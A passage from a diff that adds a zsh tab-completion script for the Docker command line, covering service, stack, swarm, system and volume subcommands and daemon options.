+        "($help)--log-driver=[Logging driver for service]:logging driver:__docker_complete_log_drivers"
+        "($help)*--log-opt=[Logging driver options]:log driver options:__docker_complete_log_options"
+        "($help)*--mount=[Attach a filesystem mount to the service]:mount: "
+        "($help)*--network=[Network attachments]:network: "
+        "($help)--no-healthcheck[Disable any container-specified HEALTHCHECK]"
+        "($help)*"{-p=,--publish=}"[Publish a port as a node port]:port: "
+        "($help)--replicas=[Number of tasks]:replicas: "
+        "($help)--reserve-cpu=[Reserve CPUs]:value: "
+        "($help)--reserve-memory=[Reserve Memory]:value: "
+        
"($help)--restart-condition=[Restart when condition is met]:mode:(any none on-failure)" + "($help)--restart-delay=[Delay between restart attempts]:delay: " + "($help)--restart-max-attempts=[Maximum number of restarts before giving up]:max-attempts: " + "($help)--restart-window=[Window used to evaluate the restart policy]:window: " + "($help)*--secret=[Specify secrets to expose to the service]:secret:__docker_complete_secrets" + "($help)--stop-grace-period=[Time to wait before force killing a container]:grace period: " + "($help -t --tty)"{-t,--tty}"[Allocate a pseudo-TTY]" + "($help)--update-delay=[Delay between updates]:delay: " + "($help)--update-failure-action=[Action on update failure]:mode:(pause continue)" + "($help)--update-max-failure-ratio=[Failure rate to tolerate during an update]:fraction: " + "($help)--update-monitor=[Duration after each task update to monitor for failure]:window: " + "($help)--update-parallelism=[Maximum number of tasks updated simultaneously]:number: " + "($help -u --user)"{-u=,--user=}"[Username or UID]:user:_users" + "($help)--with-registry-auth[Send registry authentication details to swarm agents]" + "($help -w --workdir)"{-w=,--workdir=}"[Working directory inside the container]:directory:_directories" + ) + + case "$words[1]" in + (create) + _arguments $(__docker_arguments) \ + $opts_help \ + $opts_create_update \ + "($help)*--container-label=[Container labels]:label: " \ + "($help)*--dns=[Set custom DNS servers]:DNS: " \ + "($help)*--dns-option=[Set DNS options]:DNS option: " \ + "($help)*--dns-search=[Set custom DNS search domains]:DNS search: " \ + "($help)*--env-file=[Read environment variables from a file]:environment file:_files" \ + "($help)--mode=[Service Mode]:mode:(global replicated)" \ + "($help)--name=[Service name]:name: " \ + "($help)*--publish=[Publish a port]:port: " \ + "($help -): :__docker_complete_images" \ + "($help -):command: _command_names -e" \ + "($help -)*::arguments: _normal" && ret=0 + ;; + (inspect) 
+ _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ + "($help)--pretty[Print the information in a human friendly format]" \ + "($help -)*:service:__docker_complete_services" && ret=0 + ;; + (ls|list) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*"{-f=,--filter=}"[Filter output based on conditions provided]:filter:->filter-options" \ + "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" && ret=0 + case $state in + (filter-options) + __docker_service_complete_ls_filters && ret=0 + ;; + esac + ;; + (rm|remove) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)*:service:__docker_complete_services" && ret=0 + ;; + (scale) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)*:service:->values" && ret=0 + case $state in + (values) + if compset -P '*='; then + _message 'replicas' && ret=0 + else + __docker_complete_services -qS "=" + fi + ;; + esac + ;; + (ps) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ + "($help)--no-resolve[Do not map IDs to Names]" \ + "($help)--no-trunc[Do not truncate output]" \ + "($help -q --quiet)"{-q,--quiet}"[Only display task IDs]" \ + "($help -)1:service:__docker_complete_services" && ret=0 + case $state in + (filter-options) + __docker_service_complete_ps_filters && ret=0 + ;; + esac + ;; + (update) + _arguments $(__docker_arguments) \ + $opts_help \ + $opts_create_update \ + "($help)--arg=[Service command args]:arguments: _normal" \ + "($help)*--container-label-add=[Add or update container labels]:label: " \ + "($help)*--container-label-rm=[Remove a container label by its key]:label: " \ + "($help)*--dns-add=[Add or update custom DNS servers]:DNS: " \ + "($help)*--dns-rm=[Remove custom DNS servers]:DNS: " \ + "($help)*--dns-option-add=[Add or update DNS options]:DNS option: " \ + "($help)*--dns-option-rm=[Remove 
DNS options]:DNS option: " \ + "($help)*--dns-search-add=[Add or update custom DNS search domains]:DNS search: " \ + "($help)*--dns-search-rm=[Remove DNS search domains]:DNS search: " \ + "($help)--force[Force update]" \ + "($help)*--group-add=[Add additional supplementary user groups to the container]:group:_groups" \ + "($help)*--group-rm=[Remove previously added supplementary user groups from the container]:group:_groups" \ + "($help)--image=[Service image tag]:image:__docker_complete_repositories" \ + "($help)*--publish-add=[Add or update a port]:port: " \ + "($help)*--publish-rm=[Remove a port(target-port mandatory)]:port: " \ + "($help)--rollback[Rollback to previous specification]" \ + "($help -)1:service:__docker_complete_services" && ret=0 + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_service_commands" && ret=0 + ;; + esac + + return ret +} + +# EO service + +# BO stack + +__docker_stack_complete_ps_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (desired-state) + state_opts=('accepted' 'running') + _describe -t state-opts "desired state options" state_opts && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + opts=('desired-state' 'id' 'name') + _describe -t filter-opts "filter options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_stack_complete_services_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + *) + _message 'value' && ret=0 + ;; + esac + else + opts=('id' 'label' 'name') + _describe -t filter-opts "filter options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_stacks() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + local line s + declare -a lines stacks + + lines=(${(f)${:-"$(_call_program commands docker $docker_options stack ls)"$'\n'}}) + + # Parse header line to find columns + local i=1 j=1 k header=${lines[1]} + declare -A 
begin end + while (( j < ${#header} - 1 )); do + i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) + j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) + k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) + begin[${header[$i,$((j-1))]}]=$i + end[${header[$i,$((j-1))]}]=$k + done + end[${header[$i,$((j-1))]}]=-1 + lines=(${lines[2,-1]}) + + # Service ID + for line in $lines; do + s="${line[${begin[ID]},${end[ID]}]%% ##}" + stacks=($stacks $s) + done + + _describe -t stacks-list "stacks" stacks "$@" && ret=0 + return ret +} + +__docker_complete_stacks() { + [[ $PREFIX = -* ]] && return 1 + __docker_stacks "$@" +} + +__docker_stack_commands() { + local -a _docker_stack_subcommands + _docker_stack_subcommands=( + "deploy:Deploy a new stack or update an existing stack" + "ls:List stacks" + "ps:List the tasks in the stack" + "rm:Remove the stack" + "services:List the services in the stack" + ) + _describe -t docker-stack-commands "docker stack command" _docker_stack_subcommands +} + +__docker_stack_subcommand() { + local -a _command_args opts_help + local expl help="--help" + integer ret=1 + + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (deploy|up) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)--bundle-file=[Path to a Distributed Application Bundle file]:dab:_files -g \"*.dab\"" \ + "($help -c --compose-file)"{-c=,--compose-file=}"[Path to a Compose file]:compose file:_files -g \"*.(yml|yaml)\"" \ + "($help)--with-registry-auth[Send registry authentication details to Swarm agents]" \ + "($help -):stack:__docker_complete_stacks" && ret=0 + ;; + (ls|list) + _arguments $(__docker_arguments) \ + $opts_help && ret=0 + ;; + (ps) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -a --all)"{-a,--all}"[Display all tasks]" \ + "($help)*"{-f=,--filter=}"[Filter output based on conditions provided]:filter:__docker_stack_complete_ps_filters" \ + "($help)--no-resolve[Do not map IDs to Names]" \ + "($help)--no-trunc[Do not truncate output]" \ + "($help 
-):stack:__docker_complete_stacks" && ret=0 + ;; + (rm|remove|down) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -):stack:__docker_complete_stacks" && ret=0 + ;; + (services) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*"{-f=,--filter=}"[Filter output based on conditions provided]:filter:__docker_stack_complete_services_filters" \ + "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" \ + "($help -):stack:__docker_complete_stacks" && ret=0 + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_stack_commands" && ret=0 + ;; + esac + + return ret +} + +# EO stack + +# BO swarm + +__docker_swarm_commands() { + local -a _docker_swarm_subcommands + _docker_swarm_subcommands=( + "init:Initialize a swarm" + "join:Join a swarm as a node and/or manager" + "join-token:Manage join tokens" + "leave:Leave a swarm" + "update:Update the swarm" + ) + _describe -t docker-swarm-commands "docker swarm command" _docker_swarm_subcommands +} + +__docker_swarm_subcommand() { + local -a _command_args opts_help + local expl help="--help" + integer ret=1 + + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (init) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)--advertise-addr[Advertised address]:ip\:port: " \ + "($help)*--external-ca=[Specifications of one or more certificate signing endpoints]:endpoint: " \ + "($help)--force-new-cluster[Force create a new cluster from current state]" \ + "($help)--listen-addr=[Listen address]:ip\:port: " \ + "($help)--max-snapshots[Number of additional Raft snapshots to retain]" \ + "($help)--snapshot-interval[Number of log entries between Raft snapshots]" \ + "($help)--task-history-limit=[Task history retention limit]:limit: " && ret=0 + ;; + (join) + _arguments $(__docker_arguments) -A '-*' \ + $opts_help \ + "($help)--advertise-addr=[Advertised address]:ip\:port: " \ + "($help)--availability=[Availability of the node]:availability:(active drain pause)" \ + 
"($help)--listen-addr=[Listen address]:ip\:port: " \
+                "($help)--token=[Token for entry into the swarm]:secret: " \
+                "($help -):host\:port: " && ret=0
+            ;;
+        (join-token)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -q --quiet)"{-q,--quiet}"[Only display token]" \
+                "($help)--rotate[Rotate join token]" \
+                "($help -):role:(manager worker)" && ret=0
+            ;;
+        (leave)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -f --force)"{-f,--force}"[Force this node to leave the swarm, ignoring warnings]" && ret=0
+            ;;
+        (update)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)--cert-expiry=[Validity period for node certificates]:duration: " \
+                "($help)*--external-ca=[Specifications of one or more certificate signing endpoints]:endpoint: " \
+                "($help)--dispatcher-heartbeat=[Dispatcher heartbeat period]:duration: " \
+                "($help)--max-snapshots[Number of additional Raft snapshots to retain]" \
+                "($help)--snapshot-interval[Number of log entries between Raft snapshots]" \
+                "($help)--task-history-limit=[Task history retention limit]:limit: " && ret=0
+            ;;
+        (help)
+            # Complete swarm subcommands here, not network subcommands.
+            _arguments $(__docker_arguments) ":subcommand:__docker_swarm_commands" && ret=0
+            ;;
+    esac
+
+    return ret
+}
+
+# EO swarm
+
+# BO system
+
+__docker_system_commands() {
+    local -a _docker_system_subcommands
+    _docker_system_subcommands=(
+        "df:Show docker filesystem usage"
+        "events:Get real time events from the server"
+        "info:Display system-wide information"
+        "prune:Remove unused data"
+    )
+    _describe -t docker-system-commands "docker system command" _docker_system_subcommands
+}
+
+# Dispatch completion for the `docker system` subcommand found in $words[1].
+__docker_system_subcommand() {
+    local -a _command_args opts_help
+    local expl help="--help"
+    integer ret=1
+
+    opts_help=("(: -)--help[Print usage]")
+
+    case "$words[1]" in
+        (df)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -v --verbose)"{-v,--verbose}"[Show detailed information on space usage]" && ret=0
+            ;;
+        (events)
+            _arguments $(__docker_arguments) \
+                $opts_help 
\
+                "($help)*"{-f=,--filter=}"[Filter values]:filter:__docker_complete_events_filter" \
+                "($help)--since=[Events created since this timestamp]:timestamp: " \
+                "($help)--until=[Events created until this timestamp]:timestamp: " \
+                "($help)--format=[Format the output using the given go template]:template: " && ret=0
+            ;;
+        (info)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " && ret=0
+            ;;
+        (prune)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -a --all)"{-a,--all}"[Remove all unused data, not just dangling ones]" \
+                "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \
+                "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0
+            ;;
+        (help)
+            # Complete system subcommands here, not volume subcommands.
+            _arguments $(__docker_arguments) ":subcommand:__docker_system_commands" && ret=0
+            ;;
+    esac
+
+    return ret
+}
+
+# EO system
+
+# BO volume
+
+# Offer value completions for `docker volume ls --filter` keys.
+__docker_volume_complete_ls_filters() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+
+    if compset -P '*='; then
+        case "${${words[-1]%=*}#*=}" in
+            (dangling)
+                dangling_opts=('true' 'false')
+                _describe -t dangling-filter-opts "Dangling Filter Options" dangling_opts && ret=0
+                ;;
+            (driver)
+                __docker_complete_info_plugins Volume && ret=0
+                ;;
+            (name)
+                __docker_complete_volumes && ret=0
+                ;;
+            *)
+                _message 'value' && ret=0
+                ;;
+        esac
+    else
+        opts=('dangling' 'driver' 'label' 'name')
+        _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0
+    fi
+
+    return ret
+}
+
+# Complete volume names (with driver shown) from `docker volume ls` output.
+__docker_complete_volumes() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+    declare -a lines volumes
+
+    lines=(${(f)${:-"$(_call_program commands docker $docker_options volume ls)"$'\n'}})
+
+    # Parse header line to find columns
+    local i=1 j=1 k header=${lines[1]}
+    declare -A begin end
+    while (( j < ${#header} - 1 )); do
+        i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 ))
+        j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 ))
+        k=$(( j + 
${${header[$j,-1]}[(i)[^ ]]} - 2 )) + begin[${header[$i,$((j-1))]}]=$i + end[${header[$i,$((j-1))]}]=$k + done + end[${header[$i,$((j-1))]}]=-1 + lines=(${lines[2,-1]}) + + # Names + local line s + for line in $lines; do + s="${line[${begin[VOLUME NAME]},${end[VOLUME NAME]}]%% ##}" + s="$s:${(l:7:: :::)${${line[${begin[DRIVER]},${end[DRIVER]}]}%% ##}}" + volumes=($volumes $s) + done + + _describe -t volumes-list "volumes" volumes && ret=0 + return ret +} + +__docker_volume_commands() { + local -a _docker_volume_subcommands + _docker_volume_subcommands=( + "create:Create a volume" + "inspect:Display detailed information on one or more volumes" + "ls:List volumes" + "prune:Remove all unused volumes" + "rm:Remove one or more volumes" + ) + _describe -t docker-volume-commands "docker volume command" _docker_volume_subcommands +} + +__docker_volume_subcommand() { + local -a _command_args opts_help + local expl help="--help" + integer ret=1 + + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (create) + _arguments $(__docker_arguments) -A '-*' \ + $opts_help \ + "($help -d --driver)"{-d=,--driver=}"[Volume driver name]:Driver name:(local)" \ + "($help)*--label=[Set metadata for a volume]:label=value: " \ + "($help)*"{-o=,--opt=}"[Driver specific options]:Driver option: " \ + "($help -)1:Volume name: " && ret=0 + ;; + (inspect) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ + "($help -)1:volume:__docker_complete_volumes" && ret=0 + ;; + (ls) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ + "($help)--format=[Pretty-print volumes using a Go template]:template: " \ + "($help -q --quiet)"{-q,--quiet}"[Only display volume names]" && ret=0 + case $state in + (filter-options) + __docker_volume_complete_ls_filters && ret=0 + ;; + esac + ;; + (prune) + _arguments 
$(__docker_arguments) \ + $opts_help \ + "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0 + ;; + (rm) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --force)"{-f,--force}"[Force the removal of one or more volumes]" \ + "($help -):volume:__docker_complete_volumes" && ret=0 + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_volume_commands" && ret=0 + ;; + esac + + return ret +} + +# EO volume + +__docker_caching_policy() { + oldp=( "$1"(Nmh+1) ) # 1 hour + (( $#oldp )) +} + +__docker_commands() { + local cache_policy + + zstyle -s ":completion:${curcontext}:" cache-policy cache_policy + if [[ -z "$cache_policy" ]]; then + zstyle ":completion:${curcontext}:" cache-policy __docker_caching_policy + fi + + if ( [[ ${+_docker_subcommands} -eq 0 ]] || _cache_invalid docker_subcommands) \ + && ! _retrieve_cache docker_subcommands; + then + local -a lines + lines=(${(f)"$(_call_program commands docker 2>&1)"}) + _docker_subcommands=(${${${(M)${lines[$((${lines[(i)*Commands:]} + 1)),-1]}:# *}## #}/ ##/:}) + _docker_subcommands=($_docker_subcommands 'daemon:Enable daemon mode' 'help:Show help for a command') + (( $#_docker_subcommands > 2 )) && _store_cache docker_subcommands _docker_subcommands + fi + _describe -t docker-commands "docker command" _docker_subcommands +} + +__docker_subcommand() { + local -a _command_args opts_help + local expl help="--help" + integer ret=1 + + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (attach|commit|cp|create|diff|exec|export|kill|logs|pause|unpause|port|rename|restart|rm|run|start|stats|stop|top|update|wait) + __docker_container_subcommand && ret=0 + ;; + (build|history|import|load|pull|push|save|tag) + __docker_image_subcommand && ret=0 + ;; + (container) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + 
__docker_container_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_container_subcommand && ret=0 + ;; + esac + ;; + (daemon) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*--add-runtime=[Register an additional OCI compatible runtime]:runtime:__docker_complete_runtimes" \ + "($help)--api-cors-header=[CORS headers in the Engine API]:CORS headers: " \ + "($help)*--authorization-plugin=[Authorization plugins to load]" \ + "($help -b --bridge)"{-b=,--bridge=}"[Attach containers to a network bridge]:bridge:_net_interfaces" \ + "($help)--bip=[Network bridge IP]:IP address: " \ + "($help)--cgroup-parent=[Parent cgroup for all containers]:cgroup: " \ + "($help)--cluster-advertise=[Address or interface name to advertise]:Instance to advertise (host\:port): " \ + "($help)--cluster-store=[URL of the distributed storage backend]:Cluster Store:->cluster-store" \ + "($help)*--cluster-store-opt=[Cluster store options]:Cluster options:->cluster-store-options" \ + "($help)--config-file=[Path to daemon configuration file]:Config File:_files" \ + "($help)--containerd=[Path to containerd socket]:socket:_files -g \"*.sock\"" \ + "($help -D --debug)"{-D,--debug}"[Enable debug mode]" \ + "($help)--default-gateway[Container default gateway IPv4 address]:IPv4 address: " \ + "($help)--default-gateway-v6[Container default gateway IPv6 address]:IPv6 address: " \ + "($help)*--default-ulimit=[Default ulimits for containers]:ulimit: " \ + "($help)--disable-legacy-registry[Disable contacting legacy registries]" \ + "($help)*--dns=[DNS server to use]:DNS: " \ + "($help)*--dns-opt=[DNS options to use]:DNS option: " \ + "($help)*--dns-search=[DNS search domains to use]:DNS search: " \ + "($help)*--exec-opt=[Runtime execution options]:runtime execution options: " \ + "($help)--exec-root=[Root directory for execution state files]:path:_directories" \ + "($help)--experimental[Enable experimental features]" \ + 
"($help)--fixed-cidr=[IPv4 subnet for fixed IPs]:IPv4 subnet: " \ + "($help)--fixed-cidr-v6=[IPv6 subnet for fixed IPs]:IPv6 subnet: " \ + "($help -G --group)"{-G=,--group=}"[Group for the unix socket]:group:_groups" \ + "($help -g --graph)"{-g=,--graph=}"[Root of the Docker runtime]:path:_directories" \ + "($help -H --host)"{-H=,--host=}"[tcp://host:port to bind/connect to]:host: " \ + "($help)--icc[Enable inter-container communication]" \ + "($help)--init[Run an init inside containers to forward signals and reap processes]" \ + "($help)--init-path=[Path to the docker-init binary]:docker-init binary:_files" \ + "($help)*--insecure-registry=[Enable insecure registry communication]:registry: " \ + "($help)--ip=[Default IP when binding container ports]" \ + "($help)--ip-forward[Enable net.ipv4.ip_forward]" \ + "($help)--ip-masq[Enable IP masquerading]" \ + "($help)--iptables[Enable addition of iptables rules]" \ + "($help)--ipv6[Enable IPv6 networking]" \ + "($help -l --log-level)"{-l=,--log-level=}"[Logging level]:level:(debug info warn error fatal)" \ + "($help)*--label=[Key=value labels]:label: " \ + "($help)--live-restore[Enable live restore of docker when containers are still running]" \ + "($help)--log-driver=[Default driver for container logs]:logging driver:__docker_complete_log_drivers" \ + "($help)*--log-opt=[Default log driver options for containers]:log driver options:__docker_complete_log_options" \ + "($help)--max-concurrent-downloads[Set the max concurrent downloads for each pull]" \ + "($help)--max-concurrent-uploads[Set the max concurrent uploads for each push]" \ + "($help)--mtu=[Network MTU]:mtu:(0 576 1420 1500 9000)" \ + "($help)--oom-score-adjust=[Set the oom_score_adj for the daemon]:oom-score:(-500)" \ + "($help -p --pidfile)"{-p=,--pidfile=}"[Path to use for daemon PID file]:PID file:_files" \ + "($help)--raw-logs[Full timestamps without ANSI coloring]" \ + "($help)*--registry-mirror=[Preferred Docker registry mirror]:registry mirror: " \ + 
"($help)--seccomp-profile=[Path to seccomp profile]:path:_files -g \"*.json\"" \ + "($help -s --storage-driver)"{-s=,--storage-driver=}"[Storage driver to use]:driver:(aufs btrfs devicemapper overlay overlay2 vfs zfs)" \ + "($help)--selinux-enabled[Enable selinux support]" \ + "($help)--shutdown-timeout=[Set the shutdown timeout value in seconds]:time: " \ + "($help)*--storage-opt=[Storage driver options]:storage driver options: " \ + "($help)--tls[Use TLS]" \ + "($help)--tlscacert=[Trust certs signed only by this CA]:PEM file:_files -g \"*.(pem|crt)\"" \ + "($help)--tlscert=[Path to TLS certificate file]:PEM file:_files -g \"*.(pem|crt)\"" \ + "($help)--tlskey=[Path to TLS key file]:Key file:_files -g \"*.(pem|key)\"" \ + "($help)--tlsverify[Use TLS and verify the remote]" \ + "($help)--userns-remap=[User/Group setting for user namespaces]:user\:group:->users-groups" \ + "($help)--userland-proxy[Use userland proxy for loopback traffic]" \ + "($help)--userland-proxy-path=[Path to the userland proxy binary]:binary:_files" && ret=0 + + case $state in + (cluster-store) + if compset -P '*://'; then + _message 'host:port' && ret=0 + else + store=('consul' 'etcd' 'zk') + _describe -t cluster-store "Cluster Store" store -qS "://" && ret=0 + fi + ;; + (cluster-store-options) + if compset -P '*='; then + _files && ret=0 + else + opts=('discovery.heartbeat' 'discovery.ttl' 'kv.cacertfile' 'kv.certfile' 'kv.keyfile' 'kv.path') + _describe -t cluster-store-opts "Cluster Store Options" opts -qS "=" && ret=0 + fi + ;; + (users-groups) + if compset -P '*:'; then + _groups && ret=0 + else + _describe -t userns-default "default Docker user management" '(default)' && ret=0 + _users && ret=0 + fi + ;; + esac + ;; + (events|info) + __docker_system_subcommand && ret=0 + ;; + (image) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + 
__docker_image_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_image_subcommand && ret=0 + ;; + esac + ;; + (images) + words[1]='ls' + __docker_image_subcommand && ret=0 + ;; + (inspect) + local state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ + "($help -s --size)"{-s,--size}"[Display total file sizes if the type is container]" \ + "($help)--type=[Return JSON for specified type]:type:(container image network node plugin service volume)" \ + "($help -)*: :->values" && ret=0 + + case $state in + (values) + if [[ ${words[(r)--type=container]} == --type=container ]]; then + __docker_complete_containers && ret=0 + elif [[ ${words[(r)--type=image]} == --type=image ]]; then + __docker_complete_images && ret=0 + elif [[ ${words[(r)--type=network]} == --type=network ]]; then + __docker_complete_networks && ret=0 + elif [[ ${words[(r)--type=node]} == --type=node ]]; then + __docker_complete_nodes && ret=0 + elif [[ ${words[(r)--type=plugin]} == --type=plugin ]]; then + __docker_complete_plugins && ret=0 + elif [[ ${words[(r)--type=service]} == --type=service ]]; then + __docker_complete_services && ret=0 + elif [[ ${words[(r)--type=volume]} == --type=volume ]]; then + __docker_complete_volumes && ret=0 + else + __docker_complete_containers + __docker_complete_images + __docker_complete_networks + __docker_complete_nodes + __docker_complete_plugins + __docker_complete_services + __docker_complete_volumes && ret=0 + fi + ;; + esac + ;; + (login) + _arguments $(__docker_arguments) -A '-*' \ + $opts_help \ + "($help -p --password)"{-p=,--password=}"[Password]:password: " \ + "($help -u --user)"{-u=,--user=}"[Username]:username: " \ + "($help -)1:server: " && ret=0 + ;; + (logout) + _arguments $(__docker_arguments) -A '-*' \ + $opts_help \ + "($help -)1:server: " && ret=0 + ;; + (network) + local 
curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_network_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_network_subcommand && ret=0 + ;; + esac + ;; + (node) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_node_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_node_subcommand && ret=0 + ;; + esac + ;; + (plugin) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_plugin_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_plugin_subcommand && ret=0 + ;; + esac + ;; + (ps) + words[1]='ls' + __docker_container_subcommand && ret=0 + ;; + (rmi) + words[1]='rm' + __docker_image_subcommand && ret=0 + ;; + (search) + _arguments $(__docker_arguments) -A '-*' \ + $opts_help \ + "($help)*"{-f=,--filter=}"[Filter values]:filter:->filter-options" \ + "($help)--limit=[Maximum returned search results]:limit:(1 5 10 25 50)" \ + "($help)--no-trunc[Do not truncate output]" \ + "($help -):term: " && ret=0 + + case $state in + (filter-options) + __docker_complete_search_filters && ret=0 + ;; + esac + ;; + (secret) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_secret_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + 
__docker_secret_subcommand && ret=0 + ;; + esac + ;; + (service) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_service_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_service_subcommand && ret=0 + ;; + esac + ;; + (stack) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_stack_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_stack_subcommand && ret=0 + ;; + esac + ;; + (swarm) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_swarm_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_swarm_subcommand && ret=0 + ;; + esac + ;; + (system) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_system_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_system_subcommand && ret=0 + ;; + esac + ;; + (version) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " && ret=0 + ;; + (volume) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_volume_commands && ret=0 + 
;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_volume_subcommand && ret=0 + ;; + esac + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_commands" && ret=0 + ;; + esac + + return ret +} + +_docker() { + # Support for subservices, which allows for `compdef _docker docker-shell=_docker_containers`. + # Based on /usr/share/zsh/functions/Completion/Unix/_git without support for `ret`. + if [[ $service != docker ]]; then + _call_function - _$service + return + fi + + local curcontext="$curcontext" state line help="-h --help" + integer ret=1 + typeset -A opt_args + + _arguments $(__docker_arguments) -C \ + "(: -)"{-h,--help}"[Print usage]" \ + "($help)--config[Location of client config files]:path:_directories" \ + "($help -D --debug)"{-D,--debug}"[Enable debug mode]" \ + "($help -H --host)"{-H=,--host=}"[tcp://host:port to bind/connect to]:host: " \ + "($help -l --log-level)"{-l=,--log-level=}"[Logging level]:level:(debug info warn error fatal)" \ + "($help)--tls[Use TLS]" \ + "($help)--tlscacert=[Trust certs signed only by this CA]:PEM file:_files -g "*.(pem|crt)"" \ + "($help)--tlscert=[Path to TLS certificate file]:PEM file:_files -g "*.(pem|crt)"" \ + "($help)--tlskey=[Path to TLS key file]:Key file:_files -g "*.(pem|key)"" \ + "($help)--tlsverify[Use TLS and verify the remote]" \ + 